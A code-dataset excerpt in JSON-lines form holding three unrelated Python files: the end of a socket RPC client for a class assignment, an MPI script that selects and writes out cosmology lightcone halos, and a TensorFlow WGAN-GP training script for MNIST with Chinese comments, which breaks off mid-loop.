'...')\n\t\t\ttry:\n\t\t\t\tsock = socket.create_connection((dest_host, dest_port), timeout) # opens connection with server at dest_host:dest_port\n\t\t\t\tbreak\n\t\t\texcept: \n\t\t\t\tdest_port = dest_port + 1\n\t\t\t\tcontinue\n\t\tif sock is None:\n\t\t\tprint(\"Can’t establish a connection.\")\n\t\t\tsys.exit()\n\t\treturn sock\n\n\t# Purpose & Behavior: Creates a dictionary from the provided namespace; \n\t# deletes unnecessary entries and adds unique id entry to the dict.\n\t# Input: Newly created object, and command line argument namespace (args)\n\t# Output: Dictionary with relevant entries with keys (unique id, cmd, (key/text/val) depending on cmd)\n\tdef create_dict(self, args):\n\t\targs_dict = vars(args) # converts args namespace to a dict\n\t\tkeys_to_delete = []\n\n\t\t# removes \"server\" key from dict, \n\t\t# so we only send over the necessary arguments.\n\t\tfor key, value in args_dict.items():\n\t\t\tif (key == \"server\"):\n\t\t\t\tkeys_to_delete.append(key)\n\n\t\tfor key in keys_to_delete:\n\t\t\tdel args_dict[key]\n\n\t\trequest_id = 0 # creates a unique id for the RPC\n\t\targs_dict[\"id\"] = request_id # adds entry to args_dict with the \"id\" key\n\n\t\treturn args_dict\n\n\t# Purpose & Behavior: Encodes a message and then sends it to the defined server. \n\t# Input: Newly created object, and socket where TCP connection is created and the dictionary with relevant \n\t# entries with keys (unique id, cmd, (key/text/val) depending on cmd)\n\t# Output: None\n\tdef send_to_server(self, sock, args_dict):\n\t\t# serializing dict into a JSON formatted stream and then encoded \n\t\t# into a unicode string.\n\t\tsend_msg_encoded = json.dumps(args_dict).encode()\n\t\tsend_msg_length = len(send_msg_encoded) # send message size \n\t\tsend_msg_length_encoded = struct.pack(\"!i\", send_msg_length) # encodes an int as a 32-bit binary value; big-endian\n\n\t\ttry:\n\t\t\tsock.sendall(send_msg_length_encoded) # sends encoded \"message length\" to server\n\t\t\tsock.sendall(send_msg_encoded) # sends encoded message to server\n\t\texcept:\n\t\t\tprint (\"Failed send over whole message.\")\n\t\t\tif (sock is not None):\n\t \t\t\tsock.close()\n\t \t\t\tsys.exit()\n\n\t# Purpose & Behavior: Receives a message from the server and decodes it. \n\t# Input: Newly created object, and socket where TCP connection is created.\n\t# Output: None\n\tdef recv_from_server(self, sock):\n\t\t# Receive at most msg_length bytes\n\t\t# Returns value received\n\t\tlength_of_length = 4 # length of the (length of the received message)\n\t\ttry:\n\t\t\trecvd_msg_length_encoded = sock.recv(length_of_length, socket.MSG_WAITALL) # reads the message's (from client) length\n\t\t\trecvd_msg_length, = struct.unpack(\"!i\", recvd_msg_length_encoded) # decodes the 32-bit binary value as an int; big-endian\n\t\t\trecvd_msg = sock.recv(recvd_msg_length, socket.MSG_WAITALL)# reads the message from client\n\t\texcept ConnectionResetError:\n\t\t\tprint(\"Connection dropped.\")\n\t\t\tsys.exit()\n\n\t\tif (len(recvd_msg) == 0):\n\t\t\t# recv gives 0 result if the connection has been closed\n\t\t\tprint(\"Connection terminated.\") \n\t\t\tif (sock is not None):\n\t \t\t\tsock.close()\n\t \t\t\tsys.exit()\n\t\telif (len(recvd_msg) != recvd_msg_length):\n\t\t\tprint(\"Incomplete message.\") \n\t\t\tif (sock is not None):\n\t \t\t\tsock.close()\n\t \t\t\tsys.exit()\n\t\telse:\n\t\t\ttry:\n\t\t\t\trecvd_msg = recvd_msg.decode() # decodes the message from server\n\t\t\texcept:\n\t\t\t\tprint (\"Cannot decode message.\")\n\t\t\t\tif (sock is not None):\n\t \t\t\t\tsock.close()\n\t \t\t\t\tsys.exit()\n\t\t\tprint(recvd_msg) # prints out response from server; in the format of {'status': some_str, 'result': some_str, 'id': some_str} \n\n\tdef start(self):\n\t\targs = self.parse_cmd_arguments()\n\t\tsock = self.start_connection(args)\n\t\targs_dict = self.create_dict(args)\n\t\tself.send_to_server(sock, args_dict)\n\t\tself.recv_from_server(sock)\n\t\tsock.close() # closes connection with server\n\nif __name__ == '__main__':\n\tclient = Client()\n","sub_path":"Assignment#1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"12245374","text":"# Joe Hollowed\n# CPAC 2018\n\nimport sys, os\n#sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'util'))\n\nimport pdb\nimport glob\nimport numpy as np\nfrom mpi4py import MPI\nimport genericio as gio\n#import lc_interpolation_validation as iv\n\ndef list_halos(lcDir, outDir, maxStep, minStep, rL, corrLength, phiMax, \n massDef = 'fof', minMass=1e14, maxMass=1e18, outFrac=0.01, numFiles=1):\n\n '''\n This function generates a list of halo tags, properties, and positions, in a text \n file, in the format expected by Use Case 2 of the lightcone cutout code\n at https://github.com/jhollowed/cosmo-cutout. That is, it reads the output of a\n halo lightcone run, finds all halos above some mass cut, and writes them to\n a text file with halos printed per-row, as such:\n \n output.txt:\n tag1 redshift1 mass1 radius1 conc1 conc_err1 x1 y1 z1\n tag2 redshift2 mass2 radius2 conc2 conc_err2 x2 y2 z2\n tag3 redshift3 mass3 radius3 conc3 conc_err3 x3 y3 z3\n .\n .\n .\n \n where the radius and conc columns will be omitted if the input arg massDef == \"fof\". \n The tags are written in the form {fof_halo_tag}_{lc_replication_identifier}\n\n This function is written with MPI support; if run with mpirun or mpiexec, then the \n lightcone shells found within the redshift range of interest will be distributed as \n evenly as possible across ranks.\n \n Params:\n :param lcDir: top-level directory of a halo lightcone, where the subdirectory \n structure is expected to match that described in section 4.5 (fig 7)\n of the Creating Lightcones in HACC document (step-wise subdirectories \n expected). It is expected that this lightcone was built using the\n interpolation lightcone driver, and thus the 'id' field is expected\n to contain merger tree fof tags (including fragment bits and sign). It is\n also assumed that this lightcone has been matched to either an fof or sod\n catalog.\n :para outDir: the output directory for the resultant text file\n :param maxStep: The largest (lowest redshift) lightcone shell to read in\n :param minStep: The smallest (highest redshift) lightcone shell to read in\n :param rL: The length of the simulation box underlying the input lightcone in Mpc/h\n :param corrLength: The length scale within which to consider the density field correlated \n with a halo, in Mpc/h-- halos within this length of a replicated box\n boundary will experience correlation breaks in the density field\n and will be rejected\n :param phiMax: the maximum angular scale that one may want to use on subsequent\n halo lightcone cutout runs given the halos output by this function, \n in arcseconds. Halos within that angular scale from the octant boundary\n will be rejected\n :param massDef: should either be \"fof\", \"sod\". In either case the lightcone pointed to by\n 'lcDir' is assumed to contain a mass column. If massDef='sod', then a radius,\n concentration, and concentration error is also assumed to be present in the\n lightcone\n :param minMass: The minimum halo mass to write out to the text files (defaults to 1e14)\n :param maxMass: The maximum halo mass to write out to the text files (defaults to 1e18, or \n no upper limit)\n :param outFrac: The fraction of the identified halos to actually output\n :param numFiles: How many text files to write. That is, if 30 halos are found in\n the lightcone at lcDir, between minStep and maxStep, and numFiles=3,\n then three text files will be written out, each containing 10 of the \n found halos. This option is intended to allow for separate cutout\n runs being submitted in parallel, each handling a subset of all the\n desired halos\n '''\n\n comm= MPI.COMM_WORLD\n rank = comm.Get_rank()\n numranks = comm.Get_size()\n if(rank==0):\n print('starting with {} MPI processes'.format(numranks))\n sys.stdout.flush()\n comm.Barrier()\n\n # get lightcone shells (step/snapshot numbers) matching those desired \n # by minStep and maxStep\n lcHaloSubdirs = glob.glob('{}/*'.format(lcDir))\n \n # step number is assumed to be the last three chars of the subirectory names\n steps = np.array(sorted([int(s[-3:]) for s in lcHaloSubdirs]))\n steps = steps[np.logical_and(steps >= minStep, steps <= maxStep)]\n \n # hand out different steps to different ranks. randomize them at rank 0 to \n # allow better load balancing\n np.random.seed(103)\n np.random.shuffle(steps)\n steps = np.array_split(steps, numranks)[rank]\n\n print(\"rank {} gets steps {}\".format(rank, steps))\n sys.stdout.flush()\n comm.Barrier()\n \n # arrays to hold halos in the lc found above the desired massCut (to be written out)\n write_ids = np.array([], dtype=np.int64)\n write_reps = np.array([], dtype=np.int32)\n write_x = np.array([], dtype=float)\n write_y = np.array([], dtype=float)\n write_z = np.array([], dtype=float)\n write_redshift = np.array([], dtype=float)\n write_shells = np.array([], dtype=np.int32)\n write_mass = np.array([], dtype=float)\n write_radius = np.array([], dtype=float)\n write_conc = np.array([], dtype=float)\n write_conc_err = np.array([], dtype=float)\n total=0\n\n # loop over lightcone shells\n for i in range(len(steps)):\n \n step = steps[i]\n if(step == 499): continue\n\n if(rank==0):\n print('\\n---------- working on step {} ----------'.format(step))\n sys.stdout.flush()\n \n if(rank==0):\n print('reading lightcone')\n sys.stdout.flush()\n \n # there should only be one unhashed gio file in this subdir\n lc_file = sorted(glob.glob('{1}/*{0}/*'.format(step, lcDir)))[0]\n \n # (the halo lightcone module outputs merger tree fof tags, including fragment bits)\n lc_tags = np.squeeze(gio.gio_read(lc_file, 'id'))\n lc_reps = np.squeeze(gio.gio_read(lc_file, 'replication')).astype(np.int32)\n lc_x = np.squeeze(gio.gio_read(lc_file, 'x'))\n lc_y = np.squeeze(gio.gio_read(lc_file, 'y'))\n lc_z = np.squeeze(gio.gio_read(lc_file, 'z'))\n lc_a = np.squeeze(gio.gio_read(lc_file, 'a'))\n lc_redshift = 1/lc_a - 1\n \n # get fof or sod properties from lightcone\n lc_mass = np.squeeze(gio.gio_read(lc_file, '{}_mass'.format(massDef)))\n if(massDef == 'sod'):\n lc_radius = np.squeeze(gio.gio_read(lc_file, 'sod_radius'))\n lc_conc = np.squeeze(gio.gio_read(lc_file, 'sod_cdelta'))\n lc_conc_err = np.squeeze(gio.gio_read(lc_file, 'sod_cdelta_error'))\n else:\n lc_radius = None \n lc_conc = None \n lc_conc_err = None \n\n if(rank == 0):\n print('read {} halos'.format(len(lc_mass)))\n \n # cut out id !!!!!!!!!!\n mass_mask = lc_tags == 485079778313\n \n # do mass cutting\n #mass_mask = np.logical_and(lc_mass >= minMass, lc_mass < maxMass)\n lc_tags = lc_tags[mass_mask]\n lc_reps = lc_reps[mass_mask]\n lc_redshift = lc_redshift[mass_mask]\n lc_mass = lc_mass[mass_mask]\n lc_radius = lc_radius[mass_mask]\n lc_conc = lc_conc[mass_mask]\n lc_conc_err = lc_conc_err[mass_mask]\n lc_x = lc_x[mass_mask]\n lc_y = lc_y[mass_mask]\n lc_z = lc_z[mass_mask]\n\n # add these halos to write-out arrays\n if(rank==0):\n print('Found {0} halos ({1:.5f}% of all) within mass range of {2:.2e}-{3:.2e}'\n .format(np.sum(mass_mask), (np.sum(mass_mask)/float(len(mass_mask)))*100, minMass, maxMass))\n sys.stdout.flush()\n if(rank==0):\n print('Appending halo data to write-out arrays')\n sys.stdout.flush()\n total += np.sum(mass_mask)\n if(rank==0):\n print('TOTAL: {}'.format(total))\n sys.stdout.flush()\n \n write_ids = np.hstack([write_ids, lc_tags])\n write_reps = np.hstack([write_reps, lc_reps])\n write_x = np.hstack([write_x, lc_x]) \n write_y = np.hstack([write_y, lc_y]) \n write_z = np.hstack([write_z, lc_z]) \n write_redshift = np.hstack([write_redshift, lc_redshift]) \n write_shells = np.hstack([write_shells, np.ones(np.sum(mass_mask))*step])\n write_mass = np.hstack([write_mass, lc_mass]) \n write_radius = np.hstack([write_radius, lc_radius])\n write_conc = np.hstack([write_conc, lc_conc])\n write_conc_err = np.hstack([write_conc_err, lc_conc_err])\n \n # Do downsampling according to outFrac arg\n if(len(write_ids)) > 0:\n if(outFrac != 1):\n if(rank==0):\n print('\\nDownsampling {0}% of {1} total halos'.format(outFrac*100, len(write_ids)))\n sys.stdout.flush()\n dsampling = np.random.choice(np.arange(len(write_ids)), int(len(write_ids)*outFrac), replace=False)\n write_ids = write_ids[dsampling]\n write_reps = write_reps[dsampling]\n write_x = write_x[dsampling]\n write_y = write_y[dsampling]\n write_z = write_z[dsampling]\n write_redshift = write_redshift[dsampling]\n write_shells = write_shells[dsampling]\n write_mass = write_mass[dsampling]\n write_radius = write_radius[dsampling]\n write_conc = write_conc[dsampling]\n write_conc_err = write_conc_err[dsampling]\n \n comm.Barrier()\n sys.stdout.flush()\n comm.Barrier()\n\n # send all data to rank 0 for writing\n counts = None\n tot = None\n dspls = None\n numhalos = np.ones(1, dtype='i')*len(write_ids)\n if(rank == 0): \n tot = np.zeros(1, dtype='i')\n counts = np.empty(numranks, dtype='i')\n comm.Reduce(numhalos, tot, op=MPI.SUM, root=0)\n comm.Gather(numhalos, counts, root=0)\n comm.Barrier()\n if(rank == 0):\n dspls = np.hstack([[0], np.cumsum(counts)[:-1]])\n print('{} total halos found across {} ranks'.format(tot, numranks))\n sys.stdout.flush()\n\n all_ids = None\n all_reps = None\n all_x = None\n all_y = None\n all_z = None\n all_redshift = None\n all_shell = None\n all_mass = None\n all_radius = None\n all_conc = None\n all_conc_err = None\n \n if(rank == 0):\n all_ids = np.empty(tot[0], dtype=np.int64)\n all_reps = np.empty(tot[0], dtype=np.int32)\n all_x = np.empty(tot[0], dtype=np.float64)\n all_y = np.empty(tot[0], dtype=np.float64)\n all_z = np.empty(tot[0], dtype=np.float64)\n all_redshift = np.empty(tot[0], dtype=np.float64)\n all_shell = np.empty(tot[0], dtype=np.int32)\n all_mass = np.empty(tot[0], dtype=np.float64)\n all_radius = np.empty(tot[0], dtype=np.float64)\n all_conc = np.empty(tot[0], dtype=np.float64)\n all_conc_err = np.empty(tot[0], dtype=np.float64)\n #print('Counts is {}, dspls is {}'.format(counts, dspls))\n print('Preparing to gather...')\n \n recv_ids = [all_ids, counts, dspls, MPI.LONG]\n recv_reps = [all_reps, counts, dspls, MPI.INT]\n recv_x = [all_x, counts, dspls, MPI.DOUBLE]\n recv_y = [all_y, counts, dspls, MPI.DOUBLE]\n recv_z = [all_z, counts, dspls, MPI.DOUBLE]\n recv_redshift = [all_redshift, counts, dspls, MPI.DOUBLE]\n recv_shells = [all_shell, counts, dspls, MPI.INT]\n recv_mass = [all_mass, counts, dspls, MPI.DOUBLE]\n recv_radius = [all_radius, counts, dspls, MPI.DOUBLE]\n recv_conc = [all_conc, counts, dspls, MPI.DOUBLE]\n recv_conc_err = [all_conc_err, counts, dspls, MPI.DOUBLE]\n\n comm.Gatherv([write_ids, numhalos], recv_ids, root=0)\n comm.Gatherv([write_reps, numhalos], recv_reps, root=0)\n comm.Gatherv([write_x, numhalos], recv_x, root=0)\n comm.Gatherv([write_y, numhalos], recv_y, root=0)\n comm.Gatherv([write_z, numhalos], recv_z, root=0)\n comm.Gatherv([write_redshift, numhalos], recv_redshift, root=0)\n comm.Gatherv([write_shells, numhalos], recv_shells, root=0)\n comm.Gatherv([write_mass, numhalos], recv_mass, root=0)\n comm.Gatherv([write_radius, numhalos], recv_radius, root=0)\n comm.Gatherv([write_conc, numhalos], recv_conc, root=0)\n comm.Gatherv([write_conc_err, numhalos], recv_conc_err, root=0)\n if(rank == 0):\n print('{} total halos gathered at rank 0'.format(len(all_ids)))\n sys.stdout.flush()\n \n # Now do writing to text file(s)\n if(rank==0):\n\n # remove duplicate halos\n print('Removing duplicate halos...')\n ask_unique = np.unique(all_ids, return_counts=True)\n unique_ids = ask_unique[0][ask_unique[1] == 1]\n id_mask = np.array([iid in unique_ids for iid in all_ids])\n\n # remove halos within correlation length of any replication boundary\n print('Removing halos with broken local correlations...')\n xm = np.abs((np.round(all_x/rL)*rL) - all_x) > corrLength\n ym = np.abs((np.round(all_y/rL)*rL) - all_y) > corrLength\n zm = np.abs((np.round(all_z/rL)*rL) - all_z) > corrLength\n pos_mask = np.logical_and(np.logical_and(xm, ym), zm)\n \n # and also any halos with a angular separation from the octant edge that \n # is less than the max cutout angular scale phiMax \n print('Removing halos within angular scale of octant boundary...')\n all_r = np.sqrt(all_x**2 + all_y**2 + all_z**2)\n phi = np.arctan(all_y/all_x)\n theta = np.arccos(all_z/all_r)\n phiMax = phiMax / 60 * np.pi/180.0\n thetaMax = phiMax\n ang_mask = np.logical_and(\n np.logical_and(theta > thetaMax/2, theta < ((np.pi/2-thetaMax/2))), \n np.logical_and(phi > phiMax/2, phi < ((np.pi/2-phiMax/2))))\n \n # combine id, spatial, and anuglar masks from above and cut\n mask = np.logical_and(np.logical_and(pos_mask, ang_mask), id_mask)\n all_ids = all_ids[mask]\n all_reps = all_reps[mask]\n all_x = all_x[mask]\n all_y = all_y[mask]\n all_z = all_z[mask]\n all_redshift = all_redshift[mask]\n all_shell = all_shell[mask]\n all_mass = all_mass[mask]\n all_radius = all_radius[mask]\n all_conc = all_conc[mask]\n all_conc_err = all_conc_err[mask]\n print('Removed {} total halos ({} spatial rejections and {} duplicates)'.format(np.sum(~mask), \n np.sum(np.logical_and(~pos_mask, ~ang_mask)), np.sum(~id_mask)))\n\n print('\\nDone, obtained {0} total halos to write across {1} text files'\n .format(len(all_ids), numFiles))\n sys.stdout.flush()\n \n # and combine tags and replication identifiers for unqiue ids\n combine_tags_reps = np.frompyfunc(\"{}_{}\".format, 2, 1)\n all_ids = combine_tags_reps(all_ids, all_reps)\n \n write_masks = np.array_split(np.arange(len(all_ids), dtype='i'), numFiles)\n for j in range(numFiles):\n wm = write_masks[j]\n next_file = open(\"{0}/lcHaloList_mass{1:.2e}-{2:.2e}_steps{3}-{4}_{5}.txt\"\n .format(outDir, minMass, maxMass, minStep, maxStep, j), 'w')\n print('writing {0} halos to file {1}'.format(len(wm), j+1))\n sys.stdout.flush()\n \n for n in range(len(wm)):\n if(massDef == 'sod'):\n next_file.write('{0} {1} {2} {3} {4} {5} {6} {7} {8} {9}\\n'.format(\n all_ids[wm][n], all_redshift[wm][n], \n all_shell[wm][n], all_mass[wm][n], all_radius[wm][n], \n all_conc[wm][n], all_conc_err[wm][n], \n all_x[wm][n], all_y[wm][n], all_z[wm][n]))\n elif(massDef == 'fof'):\n next_file.write('{0} {1} {2} {3} {4} {5} {6}\\n'.format(\n all_ids[wm][n], all_redshift[wm][n], \n all_shell[wm][n], all_mass[wm][n], \n all_x[wm][n], all_y[wm][n], all_z[wm][n]))\n next_file.close()\n print('Done')\n sys.stdout.flush()\n \n\n# =================================================================================================\n\n\ndef vis_output_regions(maxStep, minStep, rL, corrLength, phiMax, plotZ=False, sliceZ=False, outDir=None):\n\n '''\n Function to visualize the spatial distribution of the output of list_halos()\n given the same input parameters. In a 2d projection, a plot will be rendered\n which shows the rejected halo populations at the replicated box boundaries, \n and within an angular limit with respect to the octant edge\n\n Params:\n :param maxStep: The maximum simulation snapshot step to include\n :param minStep: The minimum simulation snapshot step to include\n :param rL: The length of the box underlying the input lightcone in Mpc/h\n :param corrLength: The length scale within which to consider correlated \n with a halo, in Mpc/h-- halos within this length of a replicated box\n boundary will experience correlation breaks in the density field\n and will be rejected\n :param phiMax: the maximum angular scale that one may want to use on subsequent\n halo lightcone cutouts given the halos output by list_halos(), \n in arcseconds\n :param plotZ: whether or not to solve the problem in 3d including the z-axis \n If False, a 2d plot is given which isn't exactly a projection \n (does not correspond to the x-y plane at any particular z-position), \n but rather demonstates the 2 dimensional anlog of the problem\n :param sliceZ: if plotZ is True, then this argument controls the plotting type. If\n False, then a 3d plot is displayed. If True, then 15 projected z-slices\n are shown\n :param outDir: Where to save plots if plotZ = sliceZ = True\n :return: None\n '''\n\n from astropy.cosmology import WMAP7 as cosmo\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n from matplotlib import rc\n\n a = np.linspace(1/201, 1, 500)\n z = 1/a-1\n zRange = z[np.array([minStep, maxStep])]\n LRange = cosmo.comoving_distance(zRange).value * cosmo.h\n \n x = np.random.rand(50000)*LRange[0]\n y = np.random.rand(50000)*LRange[0]\n z = np.random.rand(50000)*LRange[0]\n if(plotZ): r = np.sqrt(x**2 + y**2 + z**2)\n else: r = np.sqrt(x**2 + y**2)\n \n lc_mask = r < LRange[0]\n x = x[lc_mask]\n y = y[lc_mask]\n z = z[lc_mask]\n r = r[lc_mask]\n \n phiMax = phiMax / 60 * np.pi/180.0\n phi = np.arctan(y/x)\n if(plotZ):\n theta = np.arccos(z/r)\n thetaMax = phiMax\n maxRep = max([np.max((x/rL).astype(int))+1, np.max((y/rL).astype(int))+1, np.max((z/rL).astype(int))+1])\n\n # find all points which lie within the correlation length of any replication boundary\n # and also any points which have an angualr separation from the octant edge less than phiMax\n xm = np.abs((np.round(x/rL)*rL) - x) > corrLength\n ym = np.abs((np.round(y/rL)*rL) - y) > corrLength\n zm = np.abs((np.round(z/rL)*rL) - z) > corrLength\n if(plotZ): \n pm = np.logical_and(np.logical_and(xm, ym), zm)\n tm = ttm = np.logical_and(\n np.logical_and(theta > thetaMax/2, theta < ((np.pi/2-thetaMax/2))), \n np.logical_and(phi > phiMax/2, phi < ((np.pi/2-phiMax/2)))) \n else: \n pm = np.logical_and(xm, ym)\n tm = np.logical_and(phi > phiMax/2, phi < ((np.pi/2-phiMax/2))) \n mm = np.logical_and(pm, tm)\n\n\n rc('text', usetex=True)\n\n # 3d plot\n if(plotZ and not sliceZ):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.plot(x[mm], y[mm], z[mm], '.c', lw=0, ms=2)\n ax.plot(x[~mm], y[~mm], z[~mm], '.r', lw=0, ms=2)\n ax.set_zlabel(r'$z\\>[Mpc/h]$', fontsize=16)\n plt.plot(xx, yy, zz, '.m', ms=4)\n \n # 2d slices in z\n elif(plotZ and sliceZ):\n zOrd = np.argsort(z)\n xsl = np.array_split(x[zOrd], 15)\n ysl = np.array_split(y[zOrd], 15)\n zsl = np.array_split(z[zOrd], 15)\n mmsl = np.array_split(mm[zOrd], 15)\n for i in range(15):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(xsl[i][mmsl[i]], ysl[i][mmsl[i]], '.c', lw=0, ms=2)\n ax.plot(xsl[i][~mmsl[i]], ysl[i][~mmsl[i]], '.r', lw=0, ms=2)\n ax.set_xlabel(r'$x\\>[Mpc/h]$', fontsize=16)\n ax.set_ylabel(r'$y\\>[Mpc/h]$', fontsize=16)\n ax.set_title(r\"Valid Cutout Regions\" \"\\n\" r\"$\\phi_\\mathrm{max}=1000\\mathrm{arcsec},\\>l_\\xi=L/10$\")\n # plot box replication edges\n for j in range(maxRep):\n ax.plot([j*rL, (j+1)*rL], [j*rL, j*rL], lw=2, color='k')\n ax.plot([j*rL, (j+1)*rL], [(j+1)*rL, (j+1)*rL], lw=2, color='k')\n ax.plot([j*rL, j*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n ax.plot([(j+1)*rL, (j+1)*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n ax.set_xlim([np.min(x), np.max(x)])\n ax.set_ylim([np.min(y), np.max(y)])\n plt.show()\n plt.savefig('{}/{}.png'.format(outDir, i))\n return\n \n # 2d problem ignoring z\n else:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x[mm], y[mm], '.c', lw=0, ms=2)\n ax.plot(x[~mm], y[~mm], '.r', lw=0, ms=1) \n # plot box replication edges\n for j in range(maxRep):\n ax.plot([j*rL, (j+1)*rL], [j*rL, j*rL], lw=2, color='k')\n ax.plot([j*rL, (j+1)*rL], [(j+1)*rL, (j+1)*rL], lw=2, color='k')\n ax.plot([j*rL, j*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n ax.plot([(j+1)*rL, (j+1)*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n ax.set_xlim([np.min(x), np.max(x)])\n ax.set_ylim([np.min(y), np.max(y)])\n \n ax.set_xlabel(r'$x\\>[Mpc/h]$', fontsize=16)\n ax.set_ylabel(r'$y\\>[Mpc/h]$', fontsize=16)\n ax.set_title(r\"Valid Cutout Regions\" \"\\n\" r\"$\\phi_\\mathrm{{max}}=1000\\>\\mathrm{{arcsec}},\\>l_\\xi={}\\>\\mathrm{{Mpc/h}}$\".format(corrLength))\n plt.show()\n\n\n# =================================================================================================\n\n\ndef list_alphaQ_halos(maxStep=499, minStep=247, minMass=10**13.5, maxMass=1e18, outFrac=0.01, numFiles=1):\n \n '''\n This function runs list_halos with data paths predefined for AlphaQ.\n Function parameters are as given in the docstrings above for list_halos\n '''\n\n list_halos(lcDir='/projects/DarkUniverse_esp/jphollowed/alphaQ/lightcone_halos',\n outDir='/home/hollowed/cutout_run_dirs/alphaQ/cutout_alphaQ_full',\n massDef = 'sod', rL = 256, corrLength=150, phiMax=1000, \n maxStep=maxStep, minStep=minStep, minMass=minMass, maxMass=maxMass, \n outFrac=outFrac, numFiles=numFiles)\n\n\ndef list_outerRim_halos(maxStep=499, minStep=121, minMass=10**13.5, maxMass=1e18, outFrac=0.01, numFiles=1):\n \n '''\n This function runs list_halos with data paths predefined for OuterRim.\n Function parameters are as given in the docstrings above for list_halos\n '''\n\n list_halos(lcDir='/projects/DarkUniverse_esp/jphollowed/outerRim/lightcone_halos_octant_matchup_sod',\n outDir='/home/hollowed/cutout_run_dirs/outerRim/cutout_outerRim_full',\n massDef = 'sod', rL=3000, corrLength=150, phiMax=1000, \n maxStep=maxStep, minStep=minStep, minMass=minMass, maxMass=maxMass, \n outFrac=outFrac, numFiles=numFiles)\n\nif __name__ == \"__main__\":\n minMass = 10**float(sys.argv[1])\n maxMass = 10**float(sys.argv[2])\n outFrac = float(sys.argv[3])\n numFiles = int(sys.argv[4])\n maxStep = int(sys.argv[5])\n minStep = int(sys.argv[6])\n list_outerRim_halos(maxStep=maxStep, minStep=minStep, minMass=minMass, maxMass=maxMass, outFrac=outFrac, numFiles=numFiles)\n","sub_path":"lightcone/list_lc_halos.py","file_name":"list_lc_halos.py","file_ext":"py","file_size_in_byte":24615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"160617301","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport os\nimport numpy as np\nfrom scipy import misc,ndimage\n\nmnist = input_data.read_data_sets('./MNIST_data')\n\nbatch_size = 100\nwidth,height = 28,28\nmnist_dim = width*height\nrandom_dim = 10\nepochs = 1000000\n\ndef my_init(size):\n return tf.random_uniform(size, -0.05, 0.05)\n\n# 定义判别器 三层Dense网络 relu激活函数\nD_W1 = tf.Variable(my_init([mnist_dim, 128]))\nD_b1 = tf.Variable(tf.zeros([128]))\nD_W2 = tf.Variable(my_init([128, 32]))\nD_b2 = tf.Variable(tf.zeros([32]))\nD_W3 = tf.Variable(my_init([32, 1]))\nD_b3 = tf.Variable(tf.zeros([1]))\nD_variables = [D_W1, D_b1, D_W2, D_b2, D_W3, D_b3]\n\n# 定义生成器 三层Dense网络 reluctant激活函数 \n# 在这里 生成器和判别器要求网络复杂度相当->是指参数规模还是要求网络结构和参数一致?\nG_W1 = tf.Variable(my_init([random_dim, 32]))\nG_b1 = tf.Variable(tf.zeros([32]))\nG_W2 = tf.Variable(my_init([32, 128]))\nG_b2 = tf.Variable(tf.zeros([128]))\nG_W3 = tf.Variable(my_init([128, mnist_dim]))\nG_b3 = tf.Variable(tf.zeros([mnist_dim]))\nG_variables = [G_W1, G_b1, G_W2, G_b2, G_W3, G_b3]\n\n# 判别器最后直接输出结果\ndef D(X):\n X = tf.nn.relu(tf.matmul(X, D_W1) + D_b1)\n X = tf.nn.relu(tf.matmul(X, D_W2) + D_b2)\n X = tf.matmul(X, D_W3) + D_b3\n return X\n\n# 生成器最后使用sigmoid函数约束结果为(0,1)\ndef G(X):\n X = tf.nn.relu(tf.matmul(X, G_W1) + G_b1)\n X = tf.nn.relu(tf.matmul(X, G_W2) + G_b2)\n X = tf.nn.sigmoid(tf.matmul(X, G_W3) + G_b3)\n return X\n\n# 真实数据和随机数发生器的维度是一样的\nreal_X = tf.placeholder(tf.float32, shape=[batch_size, mnist_dim])\nrandom_X = tf.placeholder(tf.float32, shape=[batch_size, random_dim])\nrandom_Y = G(random_X)\n\n# eps是作为插值的随机数,构建一个介于Y和Z的分布,其中Y是生成的分布,Z是真实的分布\neps = tf.random_uniform([batch_size, 1], minval=0., maxval=1.)\n# 插值\nX_inter = eps*real_X + (1. - eps)*random_Y\n# 利用tf计算梯度,算出判别器关于两个插值的差分\ngrad = tf.gradients(D(X_inter), [X_inter])[0]\n# 标准化差分:差分的平方,按行求和,再取平方根\ngrad_norm = tf.sqrt(tf.reduce_sum((grad)**2, axis=1))\n# 惩罚项是标准化之后的差分-1,再整体求和,这一处与论文中不是特别一致,可能在本质上差不多,\n# 乘以10应该是与随机数发生器的维度一致\ngrad_pen = 10 * tf.reduce_mean(tf.nn.relu(grad_norm - 1.))\n\n# 定义判别器的损失函数,Z真实样本的求和(等价于求平均值),减去通过生成器生成的Y的求和,加上惩罚项\nD_loss = tf.reduce_mean(D(real_X)) - tf.reduce_mean(D(random_Y)) + grad_pen\n# 定义生成器的损失,就是生成的结果Y的求和,以上两个Loss都是在判别器视角下计算的,也就是D()\nG_loss = tf.reduce_mean(D(random_Y))\n\n# 定义优化函数,使用Adam\nD_solver = tf.train.AdamOptimizer(1e-4, 0.5).minimize(D_loss, var_list=D_variables)\nG_solver = tf.train.AdamOptimizer(1e-4, 0.5).minimize(G_loss, var_list=G_variables)\n\n# 标准的tf会话\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nif not os.path.exists('out/'):\n os.makedirs('out/')\n\n# 训练100000个epochs,这么多?\nfor e in range(epochs):\n for i in range(5):\n real_batch_X,_ = mnist.train.next_batch(batch_size)\n # 随机数发生器按���batch产生(-1,1)的随机数,维度为random_dim\n random_batch_X = np.random.uniform(-1, 1, (batch_size, random_dim))\n # 运行5次判别器的优化,输入为真实数据和随机数\n _,D_loss_ = sess.run([D_solver,D_loss], feed_dict={real_X:real_batch_X, random_X:random_batch_X})\n # \n random_batch_X = np.random.uniform(-1, 1, (batch_size, random_dim))\n # 运行5次判别优化之后,运行1次生成器优化,输入随机数\n _,G_loss_ = sess.run([G_solver,G_loss], feed_dict={random_X:random_batch_X})\n if e % 1000 == 0:\n # 运行1000个epochs之后,显示两个loss\n 